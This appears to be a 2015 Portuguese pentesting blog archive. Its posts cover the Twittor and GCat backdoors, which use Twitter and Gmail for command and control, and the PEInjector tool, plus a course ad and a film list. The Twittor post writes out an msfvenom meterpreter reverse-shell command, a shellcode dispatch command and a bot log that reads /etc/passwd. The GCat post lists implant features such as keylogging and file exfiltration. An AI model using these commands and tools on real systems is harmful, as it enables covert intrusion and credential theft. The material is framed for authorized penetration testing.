3 de novembro de 2015

Twittor - Backdoor usando Twitter para C&C


Olá pessoal, nesse post venho falar mais uma vez sobre um backdoor com características de Command & Control, o Twittor.

Em um dos últimos posts, falei do GCat, que usa o Gmail, mas o Twittor utiliza-se de uma outra aplicação de rede social para C&C, o Twitter (nem dá para perceber pelo seu nome...rs). O que é mais interessante é que da mesma forma que para gerenciar o GCat poderíamos usar mensgaens de email, para o Twittor usamos Direct Messages (DM) para enviar os comandos que serão executados remotamente.

Você pode baixar o aplicativo AQUI ou saber mais sobre esse programa AQUI.

Uma das coisas que achei bem interessante é a possibilidade de executar comandos remotamente, incluindo shellcodes que vc tenha gerado pelo msfvenom do Metasploit. Por exemplo, se você gerar um shellcode usando o seguinte comando:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
Basta enviar o shellcode criado com o seguinte comando, para o Twittor:

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
O número 11:22:33:44:55 é o id do seu bot client, e você poderá saber quais comandos estão disponíveis após executar o servidor através do comando:
$ python twittor.py
E digitando "help":
$ help
E é interessante também saber como enviar comando codificados, com o comando:
$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$
Para saber quais bots estão ativos, basta executar:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$
Aqui vocês podem ver uma tela de configuração do Twittor:

E uma coisa muito importante: você precisa ter uma conta no Twitter para usá-lo...rs. Apenas certifique-se de criar uma conta exclusiva para isso, sejamos inteligentes ;-)

Por hoje é só!

16 de outubro de 2015

Curso Teste de Invasão em Redes - 2016


Início em 18/01/2016

OBS: esse é o curso Pentest em Redes, que faz parte das formações completas. Qualquer pessoa pode participar do mesmo. O conteúdo do curso cobre as certificações CEH, OSCP e GPEN.

Curso de Teste de Invasão em Redes - EaD, com conteúdo completamente prático em ambiente interativo, com acesso à tela do instrutor e download de todo o material de aula (vídeos de cada aula gravada, apostila completa e logs do chat onde as dúvidas são respondidas e os comando digitados).

Os alunos, além de montarem seus laboratórios com máquinas virtuais (com S.Os. atuais), terão exemplos reais de redes e aplicações vulneráveis, encontrados na web durante a aula.

Todo o curso será baseado na distribuição KALI LINUX, com ferramentas livres e gratuitas!

O instrutor do curso possui anos de experiência em testes de invasão, tanto em redes, quanto aplicações web, redes wireless e review code. E é uma oportunidade de aprender com quem convive com as necessidades e situações reais do mercado atual, com clientes de grande porte como multinacionais de diversas áreas (Petróleo e Gás, Telecomunicações, Transportes, Operadoras de Cartão de Crédito, Bancos, Instituições Militares e Órgãos Públicos).


Alguns dos tópicos abordados no curso são:
  • Introdução à Segurança da Informação
  • Introdução ao Teste de Invasão e Ética Hacker
  • Escrita de Relatório
  • Google Hacking
  • Varreduras ativas, passivas e furtivas de rede
  • Enumeração de informações e serviços
  • Definindo vetores de ataque
  • Ignorando Proteções
  • Técnicas de Força Bruta
  • Vulnerabilidades em aplicações web
  • Elevação de Privilégios Locais
  • Testando o sistema
  • Técnicas de Sniffing
  • Ataques a Servidores WEB
  • Ataques a Redes Sem Fio
  • Introdução ao Fuzzing & Buffer Overflow Exploits
  • Metasploit Framework
  • WarGames

Quem tiver interesse no curso, por favor, acesse o link http://bit.ly/ZkbwEE e faça sua inscrição no curso "Teste de Invasão em Redes".

Carga horária: 40h
Investimento: R$ 990,00 (com possibilidade de parcelamento em até 3x no cartão de crédito via PayPal ou 12x via BCash)
Desconto: 10% de desconto para pgtos à vista via depósito.
Horário de aula: 22h às 00h
Dias de aula: segunda, e quarta-feira.
Início das aulas: 18/01/2016

15 de outubro de 2015

10 de outubro de 2015

Novos rumos e novos projetos - nascimento da HackProofing Labs

Pessoal, já há algum tempo venho maturando algumas ideias e projetos em mente, e em companhia de um grande amigo e profissional da área de Segurança da Informação.

Aos poucos, conforme o projeto onde trabalho vai se aproximando do final, essas ideias e novos projetos vão ganhando um corpo cada vez mais definido e claro. Sendo assim, vi que já era a hora de anunciar publicamente a união de dois times, a HackProofing (Luiz Vieira) e o Atrix Team (Rodrigo Matuck - http://atrixteam.blogspot.com.br/), para dar nascimento ao projeto HackProofing Labs.

Esse projeto surgiu da necessidade que nos deparamos do mercado buscar serviços de qualidade, seja de treinamento ou consultoria na área de segurança da informação, e ter dificuldade em conciliar uma boa relação entre custo e benefício.

Nosso foco será de entregar treinamentos com alto nível de qualidade e serviços de consultoria na área de segurança ofensiva e investigação com um nível de especialização ainda visto poucas vezes no Brasil.

Sendo assim, daremos um pouco mais de foco na área de pesquisa e desenvolvimento de ferramentas, e aumentaremos a contribuição para a comunidade de segurança, seja via HackProofing Labs, seja através do capítulo OWASP do RJ.

Então, preparem-se porque dentro de algumas semanas novidades surgirão e nosso site finalmente entrará no ar!

4 de outubro de 2015

GCat - Backdoor em Python

Fala Galera!

Quem é pentester, sabe que uma das fases de um teste de invasão, de acordo com a OSSTMM, é conseguir manter o acesso que foi ganho após uma exploração, para que possa fazer a movimentação lateral e a escalada de privilégio para obter mais e mais informações dentro da estrutura do alvo.

Para conseguir isso, muitas vezes é necessário prolongar o acesso para voltar mais vezes à infraestrutura comprometida, e nada melhor do que um backdoor para isso. E para esse fim, existe a ferramenta GCat, desenvolvida em Python e que usa o Gmail para "Command & Control" (o gerenciamento da backdoor).
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P 
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                          
                 d8888P  


                   .__....._             _.....__,
                     .": o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---'  

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YUR COMPUTERZ...

                        WATCHIN YUR SCREENZ

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!
Essa é a saída que temos quando executamos a ferramenta. Então aí já conseguimos ver algumas de suas funcionalidade:
- download de arquivos a partir do cliente comprometido;
- upload de arquivos para o cliente comprometido;
- execução de shellcodes personalizados (incluido aqueles que criar com o Metasploit, como o meterpreter, por exemplo);
- tirar screenshot;
- bloquear a tela e forçar o check-in;
- iniciar e parar um keylogger (em paralelo com a funcionalidade acima, fica fácil pegar a senha do usuário).

O repositório do programa contém dois arquivos:

  • gcat.py - um script que é usado para enumerar e enviar comandos para os clientes;
  • implant.py - o backdoor para fazer deployment.

Em ambos os arquivos, edite as variáveis gmail_user e gmail_pwd com o usuário e senha da conta do Gmail que criou previamente para controlar a backdoor.

É possível baixar o GCat diretamente daqui .

Divirtam-se!


23 de setembro de 2015

PEInjector: nova ferramenta para injetar payloads maliciosos em arquivos PE

Olá pessoal!

Há algumas semanas atrás comentei aqui no blog sobre duas ferramentas bem interessantes, para encoding e injeção de payload malicioso em arquivos PE.

Hoje falaremos de outra ferramenta que faz o mesmo, mas com algumas funcionalidade a mais e ainda mais fácil de usar, já que tem uma interface gráfica que roda em cima de um server web em 127.0.0.1:31338 depois que executamos o comando "peinjector --server" pós-instalação.



Abaixo podemos ver a tela de gerenciamento da ferramenta:



E a exemplo do próprio Metasploit, onde podemos configurar os payloads utilizados, o PEInjector também permite fazer isso:


Algumas características dessa ferramenta chamam bastante a atenção:

  • Open source
  • Suporta arquivos PE x86 e x64
  • Roda bem em Windows e Linux
  • Já vem com uma implementação em Python para Man-In-The-Middle
  • Além de alguns shells já existentes e bem conhecidos, é possível trabalhar com shells reversos, meterpreter e até shellcodes personalizados

Abaixo é possível ver um gráfico de como ele trabalha:


A ideia é a mesma que delineei no post sobre o Shellter Project, de como a injeção de um payload malicioso em um arquivo PE pode ser feita (sequência lógica da operação). Mas enquanto precisamos fazer isso na unha há anos, agora cada vez mais temos ferramentas que automatizam esse processo para nós.

Quem quiser saber um pouco mais sobre essa ferramenta, pode visirtar diretamente página do projeto em https://peinjector.eu/ ou o github do desenvolvedor em https://github.com/JonDoNym/peinjector .

Divirtam-se!



5 de setembro de 2015

Filmes e séries sobre segurança

Pessoal, ultimamente tem surgido uma série de vídeos e jogos que incluem o tema hacking. Já na década de 80 e 90 tivemos filmes com essa temática, assim como documentários. 

Lembro agora de "Jogos de Guerra", "Sneakers", "Matrix", "Hackers: Anjos ou Demônios", "Hackers", "Hackers 2: Operação takedown"; acho que foram os principais em termos de divulgação e conteúdo. 

 Já na última década até os dias atuais vários outros surgiram, como "Duro de Matar 4.0" e "Black Hat", que é bem mais recente. Além desses, eu gostaria de destacar e indicar a série "Mr. Robot", com conteúdo bem atual e tecnicamente correto (o que é raro de se ver), além dos documentários "Who am I" (https://www.youtube.com/watch?v=DaJ-xJ_6rS8) e "Algorithm" (https://www.youtube.com/watch?v=6qpudAhYhpc). 

 É bem interessante ver a cultura hacker se espalhando por aí e cada vez mais sendo mais bem compreendida. Obviamente que muita gente ainda não entende o estilo de vida, o conceito, a filosofia por detrás desse movimento, mas as pessoas estão bem mais esclarecidas do que a 10 anos atrás. E para finalizar, para os geeks de TI em geral, não necessariamente da área de segurança, assistam a série inglesa de 3 e temporadas de "IT Crowd" só para vermos como ainda somos pouco valorizados e compreendidos. 

 Quando nós começarmos a nos valorizar mais como profissionais, deixaremos de ser "o garoto da informática" e termos nosso lugar na sociedade mais respeitado. De qualquer forma, já tivemos um avanço no esclarecimento sobre nosso trabalho e por incrível que pareça essas séries e filmes tem ajudado e muito. Nos veremos em breve!